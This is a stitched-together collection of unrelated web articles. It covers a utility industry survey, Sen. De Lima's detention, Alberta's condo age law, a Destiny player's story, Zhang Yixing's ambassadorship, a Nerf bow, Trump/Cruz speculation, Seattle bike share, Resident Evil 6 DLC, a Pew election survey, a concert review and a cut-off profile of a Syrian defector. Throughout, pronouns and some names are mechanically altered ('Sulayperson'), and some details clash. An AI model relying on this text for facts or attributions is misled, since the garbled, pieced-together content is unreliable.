As distributed resources grow, utilities expect to push for rate design reforms to mitigate their impacts and recover fixed grid costs. As in 2016, the sector indicated broad support for time-of-use rates and fixed charge increases, while demand charges were less popular.
How utiltiies want to reform their rate designs to better recover their fixed costs State of the Electric Utility 2017
But more than controlling the spread of DERs, the survey shows electric utilities are eager to get in on the game themselves. 90% of respondents believe their company should have a DER business model, with over half indicating they should pursue rate-based investments in distributed resources.
How utilities plan to build business models for DERs State of the Electric Utility 2017
Sentiment for rate-basing DER investments was strong across the industry. About 95% of respondents indicated utilities should be able to rate-base DERs under some circumstances, and more than 70% said they should be considered appropriate in most cases. This comes in stark contrast with the opinions of prominent solar advocates, who believe that utilities should typically not be allowed to rate-base DERs given their monopoly advantages.
Utility regulation
Utilities may prize certainty in most things, but if there's one aspect of the industry they overwhelmingly want to change, it's their regulatory models.
For the third year running, utilities named their regulatory model as the largest impediment to the evolution of their business models — edging out cost concerns.
The greatest obstacles to utility business model transformation State of the Electric Utility 2017
Though cost-of-service regulation has largely governed utility investments for the last century, respondents indicated they expect to move away from the traditional model in coming years and integrate more performance-based ratemaking.
Utility executives desire more performance-based regulation State of the Electric Utility 2017
That move would largely be welcomed by the sector. Fewer than 10% of respondents indicated they think pure cost-of-service regulation is appropriate in the 21st century, while a plurality favored a mixture of traditional models with performance-based incentives.
Market reforms, plant retirements and more
The full State of the Electric Utility 2017 report contains a treasure trove of other findings on electricity market reforms, power plant retirements, utility regulation, DER policy and more. To date, it is our most comprehensive look at the attitudes of sector professionals and includes analysis by region and utility business model types.
We will further explore a number of trends from the report in the coming weeks. In the meantime, the broad narrative for the sector is clear: Even in the absence of federal action, favorable economics, customer sentiment and proactive state policies will combine with existing utility plans to continue to push the transition toward clean energy forward.
“In 2017 and beyond,” the survey concludes, “the continued evolution of the power sector — and the goal of decarbonization — may well rest with these states and their utilities."
You can read more and download the full report here.
The Senate has pulled out its security personnel from the Philippine National Police (PNP) Custodial Center where Sen. Leila de Lima is detained, as they were posted far from the lawmaker's cell and were thus “useless,” Senate President Aquilino Pimentel III said Wednesday night.
In an interview, Pimentel said they ordered on Tuesday the withdrawal of security personnel from the Office of the Senate Sergeant-at-Arms (OSSAA) posted at the detention place in Camp Crame as they were limited to being stationed outside De Lima's cell.
ADVERTISEMENT
“Theoretically, they are not really guarding (Sen. De Lima). They were 50 meters away. So it's useless,” Pimentel told reporters Wednesday night.
“We are regrouping to find out a way how we could convince people in control of the detention center to allow [the OSSAA personnel near De Lima's cell],” they said.
They said the Senate would look at the custodial center's rules, noting that the PNP had respected the Senate's restriction against arresting De Lima within the chamber's premises.
De Lima was arrested outside the Senate building early Friday morning.
A fierce critic of the Duterte administration, De Lima has been detained at the PNP Custodial Center since their arrest over allegations that they had profited from the drug trade inside the New Bilibid Prison during their time as Justice Secretary. The charges are non-bailable.
They have repeatedy denied the drug charges saying they were part of efforts of President Duterte to exact revenge against them for their sharp criticism of their policies, particularly the bloody war on drugs.
De Lima had earlier expressed concern for their safety under government detention, citing how Albuera Mayor Rolando Espinosa Sr., a drug suspect, was killed by police officers in a detention center before dawn on Nov. 5.
President Rodrigo Duterte has assured their safety while detained. /atm
ADVERTISEMENT
Read Next
LATEST STORIES
MOST READ
“We recognize that many Albertans have made significant investments on the basis of condo bylaws that were in place at the time of purchase.”
— Justice Minister Kathleen Ganley, at a news conference after introducing the Alberta Human Rights Amendment Act, 2017.
Yeah, no kidding.
Buying a home is not to be taken lightly.
Ganley, of course, is referring to the imminent end of adults-only apartment/condo buildings, ushered on Wednesday as Bill 23, the province's response to a Court of Queen's Bench order of Jan. 6, 2017, to make age discrimination part of the human rights code.
Yes, we're now going to make those Albertans who invested time, money and thought into their living arrangements go through the rigmarole of rearranging their lives, granted they get 15 years to do so.
On the bright side, that will then make many of them older than 55, the threshhold for establishing seniors-only complexes and exempt from the proposed new rules — for now.
Seniors-only complexes can set a minimum age — as long as it's older than 55.
But while homeowners get more than a decade to make a decision on their future, apartment or condo renters could be feeling the effects as early as January.
Yep, those who would prefer to rent in a child-less complex could be tripping over trikes by spring if new renters move in.
Forgive us if we wonder what the heck this has to do with human rights.
Do we really have the right to live where we are not particularly welcome — strictly due to the passel of kids we have in tow?
Does anyone really have an issue with certain complexes wishing to remain relatively quiet and chaos-free by banning children?
Could a non-senior now claim exclusion and make a human rights complaint because they are judged too young to live in a seniors' complex?
Could a new renter in a complex primarily featuring homeowners bring their kids into the mix as soon as the bill passes, thereby ending the child-free environment for all immediately, not in 15 years?
Sorry, but we're not buying this further intrusion into people's lives.
Surely if there's a market for both child-free and child-welcoming complexes, that is the only answer to this issue — and therefore it is not really an issue at all.
That's the Alberta way, isn't it?
Builders will build what they can sell and unless we've lost our mind, there are markets for both family-friendly condos and apartments and those of the child-free variety.
Remember when Alberta used to be all about free enterprise and common sense?
How about freedom of choice?
Yep, us neither, as we trip over a scooter.
Sometimes, Twitch streamer lucent_beam decides to take on what they calls ‘The Tower Challenge,' a game where they pick a low-level Destiny player to help out. After some research, the plan unfolds with a message.
“The reality is that a lot of people won't respond to a random message from someone in the Tower, thus it being a ‘challenge,' lucent_beam told Kotaku. Luckily, in this case, it worked:
The player, who had put in over 600 hours into the game, had three characters—none of which had completed a nightfall or a raid at that point. Mostly, they were playing solo, and had only recently gotten a mic to play with others. You see, this player was not like most Destiny fans. They didn't go online to learn the ins-and-outs of how Destiny worked, as lucent_beam tells it. They were a retired man, who preferred using auto rifles because they were the most accurate to play with hand tremors. They were the sort of player who solved Destiny's big Sleeper Simulant riddle by “working on it a couple of hours a day for a few days, just randomly entering the code via process of elimination until it worked.” Not a usual fan, but definitely a dedicated one.
As they played together, the man started sharing their life story with lucent_beam. It's honestly heartwarming to hear how a game like Destiny had provided them comfort during hard times, and you can hear that in the video below:
“This game actually kinda saved my life,” they said. “My wife actually passed away Christmas 2014...all my family is already passed away. My son passed away nine months ago. This game keeps my mind—I'm retired, so—this game keeps my mind pretty sharp. I feel like I live here. I have lucid dreams about living here. And those are really exciting. It's so exciting. Most exciting time of my life, being in here.”
Advertisement
“I know there is a strong Sherpa community in Destiny, but those always seemed to be helping people who helped themselves,” lucent_beam told Kotaku. “Somewhere out there, there are people who don't or can't sign up for a Sherpa raid or don't read the subreddit. Same thing with people who stream Sherpa raids: that person needed to know to get there to play. So then I made a hobby of finding people.”
Lucent_beam says they played with the grandfather for about two hours, during which they completed a Nightfall strike. Shortly afterward, they started sharing their adventures with the grandfather on social media. The tale has gone on to catch the attention of other Destiny fans and Bungie itself. Fans were so touched by the tale that they started raising money to send the player to GuardianCon 2017, a Destiny convention:
Advertisement
Better yet, others have come forth with their own uplifting Destiny stories too:
Damn.
Caption: Zhang Yixing visiting The Hunan Youth Sports History Museum.
Changsha Evening News: The appointment and press conference for Zhang Yixing, the new promotional ambassador of Hunan province's Communist Youth Group took place this afternoon in Changsha (the provincial capital). Prior to the ceremony, the news of this was going viral on the web for quite awhile. What are the impressions of the newly appointed ambassador? And what are their plans for this new job that they accepted?
As a cast in the currently popular TV show The Mystic Nine, Zhang Yixing whose native tongue is the Changsha dialect, feels especially close to the people of Hunan. As a representative of young artists from Hunan, Zhang Yixing reported that being appointed the provincial Communist Youth League promotional ambassador has been particularly excited. Zhang Yixing said “it makes me very happy to contribute to my home province.” They also promised that in the future, they will use their humble efforts and return home more often.
In recent years, the Communist Youth League of the Hunan Provincial has been working close with the youth, integrating into youth culture and carrying out “I Love Society” events in the top colleges' and universities' student clubs. As well, Zhang Yixing will serve as the campus promotional ambassador. Zhang Yixing has revealed that during their school years, they actively participated in various student organizations, such as basketball club, hip-hop club, music club and so on. Participating in these school clubs has been helpful, apart from lessening the pressure from school, they have also helped them cultivate interests and hobbies and enriched their leisure life. The dancing and singing skills they gained as a student has also been a positive impact on their career right now. They encourage the Hunan youth and tells them that “an active youth is the most vibrant youth. I hope everyone will try hard and work hard.”
This is Zhang Yixing's first public activity as the newly appointed ambassador, although they have lots of experience participating in charitable events in the past. They introduced charity project as someone with experience and said “charitable work shouldn't be measured by money. Donating money isn't the only charitable activity we can do. Every little kind action is an act of charity, so every humble action, no matter how little, matters. I also recommend that when you do participate in charitable activities, do what you can and don't force yourself.”
At the appointment ceremony, Zhang Yixing represented their fans and their fan charity (Zhang Yixing Love Fund) and made donation towards Chengbu Dan Town Center School, Leanpu Miao Dong Ethnic Group Lianfeng school, Wugang City Shuangpai Town Silong Elementary School and Guanxia school etc., for a total of nine Shaoyang schools in needs. According to reports, they will be also be shooting for promotional posters for ‘Build the New China Dream' and for Hunan Communist Youth League. These posters will be shown in subways and campus around Hunan.
NOTE: I translated this article because I wanted to clarify a few things as people seemed to be confused as to what is ‘communist' youth league is and what is a ‘propaganda' ambassador.
First of all, please remember that China is still a country with one ruling party and may not be politically free as where you and I live. Any charity or associations that's government sponsored are thereby communist party organizations. The Hunan provincial chapter of China's Youth League is just that. The majority of high school students in China belong to this League! It is not the same thing as being a member of the communist party. And even then, lots of people join the communist party not that they believe in the ideology but for job security and other reasons!
Secondly, I shake my fist at whoever was responsible for making Lay's official job title “Propaganda Ambassador” in English. 宣传 is not propaganda in this setting. It means to promote/to publicize. You don't ever see the news translate EXO宣传 to EXO propaganda do you? Shakes fist super hard.
As you know, Yixing is passionate about charity work and loves their country. He's just trying to help out their home town and home province here! And maybe get a chance to go home more often to I donno, eat their mom's homemade food! They have pledged a music scholarship for the next ten years at their old high school. Their fan club charity is one that is consistently active and has made high rankings on China's charity chart. Most recently, they donated books and sports equipment to a poor school for every episode of Go Fighting!
I can't help you if you still take offence at the word communist and or propaganda but I've explained my stance and I hope you have a better understanding of what's going on.
Since 2013, Nerf's Rebelle bow has had ladies in its sights (we suppose perhaps due to the popularity of movies like “Brave” and the “Hunger Games” series with bow-wielding heros). Michael Ritchie, the VP of Global Brand Strategy & Marketing for Nerf, says that the design of each bow and blaster in the Nerf Rebelle line “is informed based on feedback from our most important demographic: real girls.”
This week Nerf is announcing a behemoth addition to one of its iconic series: a bow measuring 4 feet in height, with totally redesigned, 24-inch composite arrows that can fire up to 100 feet, and aims truer with the first adjustable sight for the line. It's the largest bow ever from the company by more than a foot, and it fires arrows the farthest of any toy they've ever made.
Consumer insight drove Nerf to give girls not just ownership of something they've always loved, but of something arguably better than what boys have.
To be honest, I didn't intend this story to be about gender until I realized the bow was being marketed to girls. It's telling that I'd assume the bow had to be for boys: I was a young kid when the first ever Nerf Bow and Arrow came out back in 1991.
Ritchie says that girls want, essentially, the same thing boys do, just with their own personal style. “They're looking for a bow that delivers power and performance, coupled with that true-bow action so prevalent in today's pop culture trends,” says Ritchie. “Rounding out our design is a stylish edge that appeals to our core audience, including chic deco and detailed graphics.”
You'll notice that commercial, while comically ‘90s, doesn't feature any girls. Flash-forward about 25 years and the story (and product) are better. The color palate hasn't changed much, but the technology has evolved, and the video editing is better. But the commercial--which promotes the most recent bow that is currently on shelves--features girls, not boys, using the advanced Nerf bows.
It's not that girls never played with Nerf products--I can confirm that personally. I was regularly the target for my female cousins and neighbors, who often used my Nerf guns to attack me. And that's the distinction: 20 years ago it would be the boys' section where you'd find Nerf products. In my experience, the neighborhood boys would own them, and while girls often took part in weekend Nerf war, they were often forced to borrow what the boys owned, but didn't want to use.
And maybe the Rebelle's color scheme should have been a tip-off, but take a look at the 1991 commercial again. The color scheme hasn't changed that much. It's not that the bright colors were ever gender specific; on the contrary, Nerf has always made its products as gaudy as possible to avoid confusion for police officers over toy guns.
Nerf has been slowly but surely improving designs ever since: guns fire farther, plastic feels sturdier, and aesthetics are more eye-catching. Kudos to the designers: I often have to stop myself from buying Nerf guns as an adult. That's awfully good reading of consumers to have an audience that goes from the too-young-to-play-safely extreme to the too-old-to-play-safely extreme.
But for the first time it seems that consumer insight drove Nerf to give girls not just ownership of something they've always loved, but of something arguably better than what boys have. This bow is the largest the company has ever made, and it fires the arrows the farthest (another, smaller “bow” fires darts that far in the N-Strike line).
I spent Christmas watching my niece and nephew shoot each other relentlessly with Nerf guns, so it makes me happy for them and girls their age that they've got something powerful to intimidate the boys with.
Nerf looks at it a slightly different (but no less encouraging) way: Ritchie says that, “With the release of the Platinum Bow, we're providing a new way for girls to both emulate the active female characters they are looking up to and create their own new empowering play patterns.”
I'm sure that won't last forever: the arms race is always a tight one when it comes to Nerf toys. But it's nice to see that, at least in terms of marketing, there's no second place consumer anymore.
Nerf Rebelle Platinum is designed for ages 10 years & up and will be on shelves later this year, retailing for about $60.
Correction: Nerf clarified that the length of the bow is 24 inches, despite providing earlier information incorrectly labeling the length as 27. We updated the article shortly after publication to include the correct length of 24 inches.
Gooooood question by Scott McKay, and he's not just blowing smoke. A Trump/Cruz death match, while still implausible, is more plausible than it might seem thanks to Cruz's surprising fundraising strength. He's got the dough to make a long run if voters give them a reason to keep going. And so does Donald Trump, of course.
Two populists enter, one populist leaves.
Cruz has regional strength in Texas and Louisiana, which could translate into theirs picking up Perry and Jindal supporters. Despite their clashes with Graham in the Senate, Cruz' calls for a muscular foreign policy could appeal to the several dozen supporters the South Carolinian has amassed. Those of Christie's supporters who came to them for their combative style might look to Cruz rather than Trump. And then after the second round of dropouts, Cruz could gain even more support. Particularly should Paul leave the race; if they aren't gaining ground, at some point he's going to have to consider whether their smartest play won't be to return to Kentucky to defend their Senate seat, and Cruz is a friend and partner in many cases (though for Paul so is Mitch McConnell, which makes for an interesting conflict). Should Mike Huckabee and Rick Santorum drop out, none of the others has put in more work to attract the social conservatives they represent than Cruz… We could see a situation where Trump is ahead on the strength of their performance in the early states and still leads in the polls, though they might have commenced fading in the face of the various challenges befalling a presidential candidate and the terror gripping the party of having to nominate a bull-in-a-China-shop like the real estate magnate has not subsided. But while the establishment might believe Trump is beatable, they could be without candidates to beat him.
Is that what those “secret” chats between Cruz and Trump are about? Some master plan to clear the rest of the GOP field between them? Suddenly I'm imagining a “special message” from Trump next spring, aired live from their office in Trump Tower, in which they reveal that their candidacy was actually part of an elaborate pincer movement to outwit the GOP donor class and pave the way for the man he's really supporting for president — at which point Ted Cruz steps into frame. Then they both laugh mwa-ha-ha style as Karl Rove, watching from home, leaps to their feet and covers their mouth in astonishment. My God — it's all so clear now.
McKay's prediction: If forced to choose, the RINOs would swallow hard and opt for the devil they know, Ted Cruz, over the one they don't, which I think is true. Establishmentarians value stability above all things and Cruz, at least, is a known quantity, however much they may disdain their ideology. Trump, although a moderate and therefore closer to them on most policies, is a true loose cannon. Forced to choose between a guy who'd threaten the status quo from the inside and one who'd do it from the outside, they'll take door number one every time. Besides, Cruz is willing to make concessions to “electability” that Trump isn't. Look no further than immigration to see the difference. Trump is out there screeching about mass deportations; Cruz concedes that some illegals should be legalized. And of course Cruz isn't going to go out there as president and call the president of Mexico a “fat loser” or whatever.
So yeah, the establishment would go with the professional politician if they had to decide. And conservative voters, of course, would go with the true conservative. That was the significance of yesterday's PPP poll out of North Carolina: When given a choice between Trump and Marco Rubio or Scott Walker, righties opt for the latter despite giving Trump fairly solid marks on favorability. Meanwhile, undecideds would line up behind the professional pol, knowing that he'd be less likely to alienate swing voters with their rhetoric in the general election and therefore would be more electable. And even some Trump fans, satisfied that the true RINOs in the race like Jeb Bush had been eliminated, would switch to Cruz knowing that he's as anti-establishment in their own way as Trump is. I think Cruz wins the war with Trump easily.
But wait. Would the GOP establishment ever really allow a Trump/Cruz race to develop? Give me a scenario in which the early primaries play out and somehow the donor class gets caught flat-footed with Trump and Cruz the only two guys left who are viable. Imagine that they both do shockingly well early on — Trump wins New Hampshire, Cruz wins South Carolina, and one of the two of them wins Iowa. What happens at that point, with the “SEC primary” in the south on March 1st right around the corner? What happens, I think, is that establishmentarians settle on Marco Rubio as the last best “electable” hope of the party and throw an ocean of cash at them to get their message out. Walker will be a dead letter at that point after having lost Iowa and Bush will be badly damaged from having lost New Hampshire. Meanwhile, Cruz and Trump will be out on the stump banging the drum about cracking down on illegals. The obvious solution for Beltway righties is to come together behind the young, rhetorically gifted, Latino candidate with the sky high favorable ratings in all the polls. If Rubio pulled off a win over Jeb in the Florida primary, that would put them right back in the race; meanwhile, all the “somewhat conservative” voters who think Trump's a clown and that Cruz is too far right would eagerly swing behind them in a “save us, Marco!” effort. The Republican establishment didn't get to be where it is by letting itself be outmaneuvered by populist insurgents, even if one of those insurgents has a few billion in the bank. If Walker and Bush have no victories between them after New Hampshire, they'll come under heavy pressure from donors to drop out and back Rubio. And if one of them does end up with an early win, that guy will have enough momentum that he, rather than Rubio, will probably become the great establishment hope against Trump and Cruz, with loads of new money showered on them to keep them going through the primaries. There simply won't be a binary Trump/Cruz choice at any point of this race, unless there's some sort of total meltdown within the donor class.
Exit question: Are we sure McKay's right that establishmentarians would prefer Cruz over Trump? I think they would for the reasons I've stated, but the one great virtue of Trump to a Beltway Republican is that they can, in theory, be coopted ideologically. You'll have a hard time getting Cruz to go RINO because he's an ideologue; Trump, whose politics are more eclectic, should be easier to sway. Provided you can get past the thought of “fat loser” name-calling during Rose Garden press conferences, that is.
The Puget Sound Bike Share program is still in its early stages, with a kickoff planned for fall 2013, but Seattle's helmet law won't help to speed up the process.
Currently, Washington State does not have a bike helmet law, but several cities and counties, including Seattle, do. This, along with Seattle's rainy weather and steep hills, pose challenges for the bike share program.[pullquote]We live in a helmet-wearing culture and the Puget Sound bike-sharing program plans to own it.[/pullquote]
Ref Lindmark, King County Metro's transportation planner and president of the bike-share program's board, says multi-speed bikes can get riders up hills (some ride-share programs only feature one-speeders) and that even rainy weather is typically only an issue for 15 to 20 minutes, the average trip time advocates estimate people will use shared bikes. Just be thankful we don't have those Midwestern winters.
But the helmets are a little trickier. The ick factor of sharing helmets has prevented bike share programs in cities where helmets are mandatory.
There's no way around the fact that some people just may not use the program because they don't want to wear helmets. A recent New York Times article discusses this dilemma, noting that the most successful bike share programs are in Europe and US cities (including Washington, DC) that don't require helmets. I can see where they're coming from. I don't ever consider riding a bike without one, but am a bit grossed out by the thought of communal helmets. That's why I plan to bring my own.
You may ask how a bike share program can work with the helmet law---an excellent question.
Lindmark explained the canister option, where riders would pay a deposit and get a helmet from a vending machine, or "canister." When they return the bike, they get a partial refund on their deposit, and bike share program employees take the helmets away for cleaning and keep the helmet canisters refilled. Lindmarks notes, however, that an actual canister helmet-dispensing system "does not exist yet," although "there are groups working hard to develop and deploy" one.
We live in a helmet-wearing culture and the PSBS plans to own it. “We are proud to start the [bike share program] in Seattle and be a model for other cities,” Lindmark says.
Stay tuned for more updates from PSBS, as they are in the process of looking for an executive director, raising money for the pilot program, and looking for a bike vendor. Also, check out the progress. of Vancouver, BC's bike share program.
My previous BikeNerd columns here.
Share. Three new modes hit Xbox 360 in just a couple weeks. Three new modes hit Xbox 360 in just a couple weeks.
Resident Evil 6's upcoming DLC was inspired by dodgeball and Tetris Attack.
I'll let that sink in for a second while I tick off some important details about the DLC. Prior to the game's release, Capcom announced it was preparing three new multiplayer modes for Resident Evil 6. These modes are exclusive to Xbox 360 for the time being, and will cost 320 MS points per mode, or 720 points for a bundle of all three. The DLC will be available to 360 owners starting December 18. There's no word when this content might become available elsewhere.
Back to dodgeball and Tetris Attack...
Survivors Mode
Survivor Mode is effectively the RE 6 version of death match. You can play in teams or free-for-all, but you're basically trying to kill your opponents. The catch is what happens when you die. When you're killed, you respawn as a zombie, and can still attack the opposition (much like some variations of dodgeball, which Capcom told me was an inspiration for this design). If you manage to kill a human in zombie (or J'avo) form, you'll be granted a second chance, and will re-enter the battle as your original character.
Check out this commentary for a better look:
Exit Theatre Mode
Predator Mode
The Ustanak was one of the coolest parts of Resident Evil 6, and Predator Mode will finally let you play as him. Up to six people can play at one time, with one person taking on the Nemesis-like beastie, and everyone else trying to kill it. Though the mode is effectively 'Everyone vs. Ustanak,' all players are tracked individually on their score, which can go up based on a variety of actions, including saving allies.
Check out the commentary below!
Exit Theatre Mode
Onslaught Mode
Inspiration for design comes from the most unlikely places. Take Onslaught Mode, which Capcom tells me was in part derived from Tetris Attack.
Wait, what?
Fundamentally Onslaught Mode is Mercenaries Mode with a critical twist, where you're trying to rack up a high score based on kills and combos you earn as waves of enemies attack you. The catch is you're competing against someone playing separately from you on the same map. Better yet, your accrued combos store up, and when they expire, they unleash more enemies on your foe. A match ends when time or your opponent expires, ratcheting up tension in a way Mercenaries never did.
I'm not the biggest fan of RE multiplayer, but this mode might change my mind. It's easily the best of the RE 6 DLC, and might be the best adversarial experience the RE franchise has presented thus far. We'll see how the final product plays, but so far I'm impressed. Check out the commentary below for more.
Exit Theatre Mode
Rich is an Executive Editor of IGN.com and the leader of IGN's Nintendo team. They also watch over all things WWE, Resident Evil, Assassin's Creed and much more. Follow them on Twitter, if you dare!
In Presidential Contest, Voters Say ‘Basic Facts,' Not Just Policies, Are in Dispute
Most think it's important for losing candidate to publicly concede
Survey report
In the contentious weeks leading up to Election Day, voters are deeply divided over the candidates, major issues and the nation's past and future course. And, in a new survey, most voters say these differences even extend to disputes over basic facts.
Fully 81% say that most supporters of Hillary Clinton and Donald Trump not only disagree over plans and policies, but also disagree on “basic facts.” Just 18% say that while Clinton and Trump supporters often differ over plans and policies, they can agree on basic facts.
Ironically, this is a rare point of agreement among the supporters of Clinton and Trump. Comparably large shares of registered voters who back Clinton (80%) and Trump (81%) say the two sides are unable to agree on basic facts.
The survey was conducted online from September 27 to October 10 among 4,132 adults, including 3,616 registered voters, on Pew Research Center's nationally representative American Trends Panel. It was largely completed before the release of a videotape from 2005 showing Trump making lewd comments about women.
The survey finds new indications of how negative attitudes toward the opposition have become a defining feature of the current campaign. It includes a test of “feeling thermometer” ratings of the candidates. Notably, both Republicans and Democrats feel significantly less “warmly” about their own candidate than “coldly” toward the opposing candidate.
About two-thirds of Democratic and Democratic-leaning voters (68%) give Clinton “warm” ratings on a 0-100 thermometer and 66% of Republicans give a warm rating to Trump. But 85% of Democrats give Trump a cold rating, and 88% of Republicans give Clinton a cold rating.
With the election now less than a month away, the survey also finds:
Most voters continue to expect a Clinton victory. About six-in-ten voters (63%) say they think Clinton will win on Nov. 8, while just 34% expect a Trump victory. This is little changed from surveys conducted since July. However, most think the outcome will be close, regardless of who they think will win.
Most also say it is important for the losing candidate to publicly concede. A sizable majority (77%) thinks it is very important (53%) or somewhat important (24%) that the losing candidate on Nov. 8 “publicly acknowledges the winner as the legitimate president.” Just 22% say this is not too or not at all important.
Six-in-ten voters who favor Clinton (60%) say it is very important for the losing candidate to concede, as do 51% of Trump supporters.
Split-ticket voting is still rare. As in the recent past, split-ticket voting is relatively rare, and most who expect to do so this year is splitting their ballots between third-party candidates for president and either Republicans or Democrats for the Senate and House. Overall, just 8% of voters in the 34 states with Senate races say they will vote for either Clinton or Trump for president and a Senate candidate from the opposing party. Even fewer (4%) expect to vote for a Democrat or Republican for president and a House candidate from the other party.
Rating the candidates on a ‘feeling thermometer'
As part of a major study of political animosity, released in June, respondents were asked to rate several leading political figures, including Hillary Clinton and Donald Trump, on a 0-100 “thermometer” – where 0 is the coldest, most negative rating and 100 represents the warmest, most positive rating.
Views of Clinton and Trump have changed only modestly since then. Among all voters, Clinton's mean, or average, rating is 40, while Trump's is 37. Far more voters give both candidates “cold” than “warm” ratings on the 0-100 scale.
These ratings remain deeply polarized along partisan lines. Democrats and Democratic-leaning independent voters give the Republican nominee a mean rating of just 10 on the feeling thermometer. Fully 85% give Trump a cold rating, with 77% rating them very coldly (0-24 on the 100-point scale). In fact, most Democrats (58%) give Trump a rating of zero.
Likewise, Republican and Republican-leaning voters give Clinton an average rating of 11 on the 0-100 scale. A wide majority give them a very cold (77%) or somewhat cold (10%) rating, including 56% who give them a rating of zero.
Across both parties, a majority of voters express warm feelings toward their own party's nominee, but fewer rate their party's candidate warmly than rate their opponent coldly. Two-thirds of Republicans (66%) give Trump a very or somewhat warm rating, and a comparable share of Democrats (68%) express warmth toward Clinton.
While voters who supported Donald Trump or Hillary Clinton in the primaries have not changed in their ratings of the candidates since spring, supporters of other primary candidates across both parties have grown somewhat warmer in their attitudes toward their party's presidential nominee.
Currently, Republican and Republican-leaning voters give Donald Trump a mean rating of 65 on the 0-100 scale, up from 56 in May.
The change since then has come entirely among GOP voters who supported primary candidates other than Trump. Trump's mean thermometer rating among Republican voters who backed a candidate other than Trump for the Republican nomination is 57; in May, it was only 37.
Still, Republican voters who supported Trump in the primary give far warmer ratings of the candidate; the mean rating among Trump primary supporters in May was 83, and today it is 81.
Among Democrats, supporters of Bernie Sanders in the primary gave Clinton a mean rating of 51 in May; Sanders primary supporters now give them an average rating of 59. Despite the warmer attitudes among Sanders supporters over the course of the campaign, Clinton's primary supporters continue to rate them far higher on the “thermometer” (85 then, 81 now).
Demographic differences in thermometer ratings
Feelings toward the candidates also vary across demographic groups, though there are few groups of voters that give either candidate a “warm” mean rating of 51 or higher.
Voters overall give an average rating of 37 of Trump, and 40 of Clinton. The average rating of Clinton among women is higher than their average rating of Trump (46 vs. 33), while men give Trump a higher mean rating (41) than they do Clinton (34).
Most black voters feel very warmly toward Clinton – their mean rating among blacks is 69 – while registering very cold ratings for Trump (mean rating of 15). By contrast, whites, on average, feel more warmly toward Trump (42 mean rating) than Clinton (33).
Hispanics' average thermometer ratings are much higher for Clinton (mean rating of 56) than Trump (24). (For more on Hispanics' attitudes about the candidates, see “Latino Voters and the 2016 Election.”)
Notably, most white evangelical Protestant voters feel warmly toward Trump; their mean rating among white evangelicals is 58, while Clinton's is just 17. By contrast, Clinton's mean rating is much higher than Trump's among religiously unaffiliated voters (45 vs. 22).
While there are only modest differences by age in ratings of Clinton, ratings of Trump vary significantly by age. Voters under 30 give Trump a rating of 23, on average, which is much lower on the scale than the average rating among voters ages 65 and older (46).
Voters with postgraduate degrees give Trump far lower ratings on average than those with less education (25 vs. 43 among those with a high school diploma or less education). Those who have postgraduate degrees are closer to neutral in feelings toward Clinton, with an average rating of 48 on the 0-100 scale.
Voters' views of the election outcome and its aftermath
While Clinton is widely expected to win, far more who anticipate a Clinton victory think it will be a close election (44% of all voters say this) than say they will win by “a lot” (19% say this). Similarly, while 34% predict a Trump victory, most who do so (25% of all voters) expect it will be by close margin.
Overall, Clinton supporters are much more confident of victory than are Trump supporters. Fully 92% of registered voters who support Clinton for president expect them to win; 69% of Trump supporters expect them to win.
Among voters who support Libertarian Party nominee Gary Johnson or Green Party nominee Jill Stein, 64% expect Clinton to win.
GOP voters who did not support Trump in the Republican primaries are particularly skeptical about their general election prospects. Only half (50%) of Republican and Republican-leaning registered voters who did not support Trump in the primaries say they will win, while about the same percentage (48%) expect Clinton to win. About three-quarters of GOP voters who backed Trump in the primaries (76%) anticipate a Trump victory on Nov. 8.
Among Democrats, overwhelming shares of those who supported Bernie Sanders in the primaries (88%) and Clinton primary supporters (94%) expect Clinton to win next month.
When the election is concluded, most voters say it is either very important (53%) or somewhat important (24%) for the losing candidate to acknowledge the winner as “the legitimate president of the country.” Only about one in five (22%) say a public concession by the losing candidate is “not too” or “not at all important.”
Clinton supporters (60%) are more likely than Trump supporters (51%) to view a concession as very important. Only about one in five of each candidate's supporters (21% of Trump backers, 16% of Clinton backers) say this is not important. By contrast, roughly twice as many Johnson and Stein supporters (41%) think it is not too or not at all important that the losing candidate publicly acknowledge the winner as the legitimate president.
Few intend to split ballots between Democrats and Republicans
When asked who they are supporting in the November election, 65% of voters say they will be supporting candidates from the same party in their votes for the presidency and House of Representatives. A slightly smaller proportion of voters in states with Senate races (58%) say they will be supporting candidates from the same party in their votes for the Senate and presidency.
About half of these “straight-ticket” voters (30% for the House and 25% for the Senate) say they will be voting for Republicans; the remainder says they will vote for Democrats (36% in the House and 33% in the Senate).
The number of voters who say they will be supporting the Republican candidate for president and the Democratic candidate for Congress, or vice versa, is very small. Only 2% of voters say they will vote for Donald Trump for president and a Democratic candidate for the House. As many (2%), say they will support Hillary Clinton for president and a Republican candidate for the House.
Many of those who are splitting their ballots this year favor either Gary Johnson or Jill Stein for president, while supporting Democrats or Republicans for the House. Overall, 5% support Johnson or Stein and plan on voting for a Republican in their congressional race. A similar proportion of Johnson and Stein supporters (4%) say they will vote for the Democrat in their House district. Less than 1% of voters are not supporting major party candidates either for president or the House.
Another 15% have a presidential preference, but say they do not know who they are supporting in their congressional race.
In Senate races, which generally have a higher profile than House races, 8% say they are voting for a Republican or Democratic presidential candidate, and a Senate candidate from the other party. About one-in-ten (11%) split their ticket in another way, with most (10% overall) supporting Johnson or Stein for president and a major party candidate for Senate.
I'm not an expert on rap music. My major influences are pretty basic, Kendrick, Kanye, Run the Jewels, and Outkast to name a few, but that isn't to say that I don't come with an open ear and an open mind to any new artists or opportunities. So when I got the news that I would be covering Future and Young Thug before a last second change) at Lakewood Amphitheatre, I was elated at the prospect of getting to see two of the most popular acts in rap for the first time.
An unseasonably cold and rainy day could've kept the crowd at home, especially in a mostly outdoor venue, but the sell-out crowd showed up in a big way for the hometown trap stars. Thugger's first few songs lacked the kind of fire that you would expect from him. With that being said, they quickly hit their stride and gave the quickly-filling amphitheater a headliner's energy as they made their way through a setlist that was chock-full of old songs for the old school fans as well as current hits “Wyclef Jean” and “Pick up the Phone," which features the sadly absent Quavo.
Before the Syrian war, Yaseen Sulayperson was the head of the Latakia countryside branch of the mukhabarat, the omnipresent intelligence apparatus.
A 34-year-old Alawite from Jableh, in south Latakia province, Sulayperson was well-placed to crack down on early protests that spread across Syria in 2011. But on June 15, 2012, they defected because of what they call “the violent way peaceful protests were dealt with at the beginning of the revolution and my unwillingness to participate in the regime's systematic killing of the Syrian people.”
Not only did Sulayperson defect, they went and joined the Free Syrian Army in Idlib province. There,he was considered “one of them.” At first.
Then the hardline Sunnis poured into Syria, forming Islamist factions and spreading sectarianism within the opposition. After nine months in the FSA, Sulayperson fled to Turkey.
Photo courtesy of Yaseen Sulayperson.
